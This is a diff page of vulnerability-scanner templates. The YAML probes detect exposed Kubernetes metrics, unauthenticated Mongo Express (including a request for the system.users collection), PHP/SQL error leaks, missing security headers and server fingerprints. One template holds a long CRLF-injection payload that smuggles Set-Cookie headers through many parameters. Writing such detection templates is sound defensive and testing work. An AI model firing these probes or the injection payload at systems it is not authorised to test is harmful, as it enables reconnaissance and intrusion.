- type: regex
|
||||
name: x-content-type-options
|
||||
regex:
|
||||
- "(?i)x-content-type-options"
|
||||
negative: true
|
||||
part: header
|
||||
|
||||
- type: regex
|
||||
name: x-permitted-cross-domain-policies
|
||||
regex:
|
||||
- "(?i)x-permitted-cross-domain-policies"
|
||||
negative: true
|
||||
part: header
|
||||
|
||||
- type: regex
|
||||
name: referrer-policy
|
||||
regex:
|
||||
- "(?i)referrer-policy"
|
||||
negative: true
|
||||
part: header
|
||||
|
||||
- type: regex
|
||||
name: clear-site-data
|
||||
regex:
|
||||
- "(?i)clear-site-data"
|
||||
negative: true
|
||||
part: header
|
||||
|
||||
- type: regex
|
||||
name: cross-origin-embedder-policy
|
||||
regex:
|
||||
- "(?i)cross-origin-embedder-policy"
|
||||
negative: true
|
||||
part: header
|
||||
|
||||
- type: regex
|
||||
name: cross-origin-opener-policy
|
||||
regex:
|
||||
- "(?i)cross-origin-opener-policy"
|
||||
negative: true
|
||||
part: header
|
||||
|
||||
- type: regex
|
||||
name: cross-origin-resource-policy
|
||||
regex:
|
||||
- "(?i)cross-origin-resource-policy"
|
||||
negative: true
|
||||
part: header
|
||||
|
||||
- type: regex
|
||||
name: access-control-allow-origin
|
||||
regex:
|
||||
- "(?i)access-control-allow-origin"
|
||||
negative: true
|
||||
part: header
|
||||
|
||||
- type: regex
|
||||
name: access-control-allow-credentials
|
||||
regex:
|
||||
- "(?i)access-control-allow-credentials"
|
||||
negative: true
|
||||
part: header
|
||||
|
||||
- type: regex
|
||||
name: access-control-expose-headers
|
||||
regex:
|
||||
- "(?i)access-control-expose-headers"
|
||||
negative: true
|
||||
part: header
|
||||
|
||||
- type: regex
|
||||
name: access-control-max-age
|
||||
regex:
|
||||
- "(?i)access-control-max-age"
|
||||
negative: true
|
||||
part: header
|
||||
|
||||
- type: regex
|
||||
name: access-control-allow-methods
|
||||
regex:
|
||||
- "(?i)access-control-allow-methods"
|
||||
negative: true
|
||||
part: header
|
||||
|
||||
- type: regex
|
||||
name: access-control-allow-headers
|
||||
regex:
|
||||
- "(?i)access-control-allow-headers"
|
|
@ -0,0 +1,29 @@
|
|||
id: kubernetes-metrics
|
||||
|
||||
info:
|
||||
name: Detect Kubernetes Exposed Metrics
|
||||
author: pussycat0x
|
||||
severity: low
|
||||
description: Information Disclosure of Garbage Collection
|
||||
tags: kubernetes,exposure,devops
|
||||
reference: https://kubernetes.io/docs/concepts/cluster-administration/system-metrics/#metrics-in-kubernetes
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/metrics"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
condition: and
|
||||
words:
|
||||
- "namespace"
|
||||
- "HELP"
|
||||
- "TYPE"
|
||||
- "kube"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -13,16 +13,18 @@ requests:
|
|||
path:
|
||||
- '{{BaseURL}}/pods'
|
||||
- '{{BaseURL}}/api/v1/pods'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "apiVersion"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "application/json"
|
||||
part: header
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,24 @@
|
|||
id: kubernetes-resource-report
|
||||
|
||||
info:
|
||||
name: Detect Overview Kubernetes Resource Report
|
||||
author: pussycat0x
|
||||
severity: medium
|
||||
description: Information Disclosure of Kubernetes Resource Report
|
||||
tags: kubernetes,exposure
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "Overview - Kubernetes Resource Report"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,26 @@
|
|||
id: node-exporter-metrics
|
||||
|
||||
info:
|
||||
name: Detect Node Exporter Metrics
|
||||
author: pussycat0x
|
||||
severity: low
|
||||
description: Information Disclosure of Garbage Collection
|
||||
tags: node,exposure,debug
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/metrics"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "node_cooling_device"
|
||||
- "node_network"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -2,31 +2,39 @@ id: php_errors
|
|||
|
||||
info:
|
||||
name: PHP errors
|
||||
author: w4cky_
|
||||
author: w4cky_,geeknik
|
||||
severity: info
|
||||
tags: debug
|
||||
tags: debug,php
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "Fatal error"
|
||||
- "Call to undefined method"
|
||||
- "You have an error in your SQL syntax;"
|
||||
- "MySQL server version for the right syntax to use near"
|
||||
- "PHP Warning"
|
||||
- "PHP Error"
|
||||
- "Warning: mysql_connect():"
|
||||
- "Warning: mysql_query()"
|
||||
- "Warning: pg_connect():"
|
||||
- "failed to open stream: HTTP request failed"
|
||||
- "SAFE MODE Restriction in effect."
|
||||
- "Cannot modify header information"
|
||||
- "ORA-00921: unexpected end of SQL command"
|
||||
- "ORA-00933: SQL command not properly ended"
|
||||
- "ORA-00936: missing expression"
|
||||
- "ORA-12541: TNS:no listener"
|
||||
extractors:
|
||||
- type: regex
|
||||
regex:
|
||||
- '(?i)Fatal error'
|
||||
- '(?i)Call to undefined method'
|
||||
- '(?i)You have an error in your SQL syntax'
|
||||
- '(?i)MySQL server version for the right syntax to use near'
|
||||
- '(?i)MySQL cannot create a temporary file'
|
||||
- '(?i)PHP (Warning|Error)'
|
||||
- '(?i)Warning\: (pg|mysql)_(query|connect)\(\)'
|
||||
- '(?i)failed to open stream\:'
|
||||
- '(?i)SAFE MODE Restriction in effect'
|
||||
- '(?i)Cannot modify header information'
|
||||
- '(?i)ORA-00921\: unexpected end of SQL command'
|
||||
- '(?i)ORA-00933\: SQL command not properly ended'
|
||||
- '(?i)ORA-00936\: missing expression'
|
||||
- '(?i)ORA-12541\: TNS\:no listener'
|
||||
- '(?i)uncaught exception'
|
||||
- '(?i)include_path'
|
||||
- '(?i)undefined index'
|
||||
- '(?i)undefined variable\:'
|
||||
- '(?i)stack trace\:'
|
||||
- '(?i)expects parameter [0-9]*'
|
||||
- '(?i)Debug Trace'
|
||||
- '(?i)(syntax|parse) error'
|
||||
- '(?i)Allowed Memory Size of \d* Bytes Exhausted'
|
||||
- '(?i)Maximum execution time of \d* seconds exceeded'
|
||||
|
|
|
@ -1,8 +1,8 @@
|
|||
id: unauthenticated-mongo-express.yaml
|
||||
id: unauthenticated-mongo-express
|
||||
|
||||
info:
|
||||
name: Mongo Express Unauthenticated
|
||||
author: dhiyaneshDK
|
||||
author: dhiyaneshDK,b0rn2r00t
|
||||
severity: high
|
||||
reference: https://www.exploit-db.com/ghdb/5684
|
||||
tags: mongo,unauth
|
||||
|
@ -12,12 +12,15 @@ requests:
|
|||
path:
|
||||
- '{{BaseURL}}'
|
||||
- '{{BaseURL}}/mongo-express/'
|
||||
- '{{BaseURL}}/db/admin/system.users'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '<title>Home - Mongo Express</title>'
|
||||
- '<title>system.users - Mongo Express</title>'
|
||||
condition: or
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
|
|
@ -0,0 +1,25 @@
|
|||
id: abyss-web-server
|
||||
|
||||
info:
|
||||
name: Detect Abyss Web Server
|
||||
author: pussycat0x
|
||||
severity: info
|
||||
tags: tech
|
||||
additional-fields:
|
||||
fofa-dork: 'app="Abyss-Web-Server"'
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "Welcome to Abyss Web Server"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,62 @@
|
|||
id: adobe-coldfusion-detector
|
||||
|
||||
info:
|
||||
name: Adobe ColdFusion Detector
|
||||
author: philippedelteil
|
||||
severity: info
|
||||
description: With this template we can detect the version number of Coldfusion instances based on their logos.
|
||||
tags: adobe,coldfusion
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/CFIDE/administrator/images/mx_login.gif"
|
||||
- "{{BaseURL}}/cfide/administrator/images/mx_login.gif"
|
||||
- "{{BaseURL}}/CFIDE/administrator/images/background.jpg"
|
||||
- "{{BaseURL}}/cfide/administrator/images/background.jpg"
|
||||
- "{{BaseURL}}/CFIDE/administrator/images/componentutilslogin.jpg"
|
||||
- "{{BaseURL}}/cfide/administrator/images/componentutilslogin.jpg"
|
||||
|
||||
redirects: true
|
||||
stop-at-first-match: true
|
||||
max-redirects: 2
|
||||
matchers:
|
||||
- type: dsl
|
||||
name: "coldfusion-8"
|
||||
dsl:
|
||||
- "status_code==200 && (\"da07693b70ddbac5bc0d8bf98d4a3539\" == md5(body))"
|
||||
|
||||
- type: dsl
|
||||
name: "coldfusion-9"
|
||||
dsl:
|
||||
- "status_code==200 && (\"c0757351b00f7ecf35a035c976068d12\" == md5(body))"
|
||||
|
||||
- type: dsl
|
||||
name: "coldfusion-10"
|
||||
dsl:
|
||||
- "status_code==200 && (\"a4c81b7a6289b2fc9b36848fa0cae83c\" == md5(body))"
|
||||
|
||||
- type: dsl
|
||||
name: "coldfusion-11"
|
||||
dsl:
|
||||
- "status_code==200 && (\"7f024de9f480481ca03049e0d66679d6\" == md5(body))"
|
||||
|
||||
- type: dsl
|
||||
name: "coldfusion-2016"
|
||||
dsl:
|
||||
- "status_code==200 && (\"f1281b6866aef66e35dc36fe4f0bf990\" == md5(body))"
|
||||
|
||||
- type: dsl
|
||||
name: "coldfusion-2021"
|
||||
dsl:
|
||||
- "status_code==200 && (\"a88530d7f1980412dac076de732a4e86\" == md5(body))"
|
||||
|
||||
- type: dsl
|
||||
name: "coldfusion-2018"
|
||||
dsl:
|
||||
- "status_code==200 && (\"92ef6ee3c4d1700e3cca797b19d3e7ba\" == md5(body))"
|
||||
|
||||
- type: dsl
|
||||
name: "coldfusion-mx-7"
|
||||
dsl:
|
||||
- "status_code==200 && (\"cb594e69af5ba15bca453f76aca53615\" == md5(body))"
|
|
@ -14,6 +14,7 @@ requests:
|
|||
- "{{BaseURL}}/axis2/"
|
||||
- "{{BaseURL}}/axis/"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
|
|
|
@ -0,0 +1,28 @@
|
|||
id: craft-cms-detect
|
||||
|
||||
info:
|
||||
name: Craft CMS Detect
|
||||
author: skeltavik
|
||||
severity: info
|
||||
description: Detects Craft CMS
|
||||
reference: https://craftcms.com
|
||||
tags: tech,craftcms
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}'
|
||||
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- 'X-Powered-By: Craft CMS'
|
||||
|
||||
- type: regex
|
||||
part: header
|
||||
regex:
|
||||
- 'Set-Cookie: (Craft|CRAFT)'
|
|
@ -52,6 +52,7 @@ requests:
|
|||
|
||||
body: '{"query":"query IntrospectionQuery{__schema {queryType { name }}}"}'
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
|
|
|
@ -0,0 +1,25 @@
|
|||
id: kubernetes-enterprise-manager
|
||||
|
||||
info:
|
||||
name: Detect Kubernetes Enterprise Manager
|
||||
author: pussycat0x
|
||||
severity: info
|
||||
tags: tech,kubernetes
|
||||
additional-fields:
|
||||
fofa-dork: 'app="Kubernetes-Enterprise-Manager"'
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "Kubernetes Enterprise Manager"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,25 @@
|
|||
id: kubernetes-mirantis
|
||||
|
||||
info:
|
||||
name: Detect Mirantis Kubernetes Engine
|
||||
author: pussycat0x
|
||||
severity: info
|
||||
tags: tech,kubernetes
|
||||
additional-fields:
|
||||
fofa-dork: 'app="Mirantis-Kubernetes-Engine"'
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "Mirantis Kubernetes Engine"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -14,6 +14,7 @@ requests:
|
|||
- "{{BaseURL}}/iNotes/Forms85.nsf"
|
||||
- "{{BaseURL}}/iNotes/Forms9.nsf"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
|
|
|
@ -29,6 +29,7 @@ requests:
|
|||
- "{{BaseURL}}/openam/json/serverinfo/*"
|
||||
|
||||
redirects: true
|
||||
stop-at-first-match: true
|
||||
max-redirects: 2
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
|
|
@ -0,0 +1,25 @@
|
|||
id: oracle-iplanet-web-server
|
||||
|
||||
info:
|
||||
name: Detect Oracle-iPlanet-Web-Server
|
||||
author: pussycat0x
|
||||
severity: info
|
||||
tags: tech,oracle
|
||||
additional-fields:
|
||||
fofa-dork: 'app="Oracle-iPlanet-Web-Server'
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "Oracle iPlanet Web Server"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -29,6 +29,7 @@ requests:
|
|||
- '{{BaseURL}}/cms/portlets/Telerik.Web.UI.DialogHandler.aspx?dp=1'
|
||||
- '{{BaseURL}}/dashboard/UserControl/CMS/Page/Telerik.Web.UI.DialogHandler.aspx/Desktopmodules/Admin/dnnWerk.Users/DialogHandler.aspx?dp=1'
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
|
|
|
@ -20,6 +20,7 @@ requests:
|
|||
- "{{BaseURL}}/?Page=%0D%0ASet-Cookie:crlfinjection=crlfinjection&_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&callback=%0D%0ASet-Cookie:crlfinjection=crlfinjection&checkout_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&content=%0D%0ASet-Cookie:crlfinjection=crlfinjection&continue=%0D%0ASet-Cookie:crlfinjection=crlfinjection&continueTo=%0D%0ASet-Cookie:crlfinjection=crlfinjection&counturl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&data=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dest=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dest_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dir=%0D%0ASet-Cookie:crlfinjection=crlfinjection&document=%0D%0ASet-Cookie:crlfinjection=crlfinjection&domain=%0D%0ASet-Cookie:crlfinjection=crlfinjection&done=%0D%0ASet-Cookie:crlfinjection=crlfinjection&download=%0D%0ASet-Cookie:crlfinjection=crlfinjection&feed=%0D%0ASet-Cookie:crlfinjection=crlfinjection&file=%0D%0ASet-Cookie:crlfinjection=crlfinjection&host=%0D%0ASet-Cookie:crlfinjection=crlfinjection&html=%0D%0ASet-Cookie:crlfinjection=crlfinjection&http=%0D%0ASet-Cookie:crlfinjection=crlfinjection&https=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image_src=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&imageurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&include=%0D%0ASet-Cookie:crlfinjection=crlfinjection&media=%0D%0ASet-Cookie:crlfinjection=crlfinjection&navigation=%0D%0ASet-Cookie:crlfinjection=crlfinjection&next=%0D%0ASet-Cookie:crlfinjection=crlfinjection&open=%0D%0ASet-Cookie:crlfinjection=crlfinjection&out=%0D%0ASet-Cookie:crlfinjection=crlfinjection&page=%0D%0ASet-Cookie:crlfinjection=crlfinjection&page_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&pageurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&path=%0D%0ASet-Cookie:crlfinjection=crlfinjection&picture=%0D%0ASet-Cookie:crlfinjection=crlfinjection&port=%0D%0ASet-Cookie:crlfinjection=crlfinjection&proxy=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redir=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirect=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirectUri&redirectUrl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&reference=%0D%0ASet-Cookie:crlfinjection=crlfinjection&referrer=%0D%0ASet-Cookie:crlfinjection=crlfinjection&req=%0D%0ASet-Cookie:crlfinjection=crlfinjection&request=%0D%0ASet-Cookie:crlfinjection=crlfinjection&retUrl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return=%0D%0ASet-Cookie:crlfinjection=crlfinjection&returnTo=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return_path=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return_to=%0D%0ASet-Cookie:crlfinjection=crlfinjection&rurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&show=%0D%0ASet-Cookie:crlfinjection=crlfinjection&site=%0D%0ASet-Cookie:crlfinjection=crlfinjection&source=%0D%0ASet-Cookie:crlfinjection=crlfinjection&src=%0D%0ASet-Cookie:crlfinjection=crlfinjection&target=%0D%0ASet-Cookie:crlfinjection=crlfinjection&to=%0D%0ASet-Cookie:crlfinjection=crlfinjection&uri=%0D%0ASet-Cookie:crlfinjection=crlfinjection&url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&val=%0D%0ASet-Cookie:crlfinjection=crlfinjection&validate=%0D%0ASet-Cookie:crlfinjection=crlfinjection&view=%0D%0ASet-Cookie:crlfinjection=crlfinjection&window=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirect_to=%0D%0ASet-Cookie:crlfinjection=crlfinjection"
|
||||
- "{{BaseURL}}/?Test=%0D%0ASet-Cookie:crlfinjection=crlfinjection"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
|
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue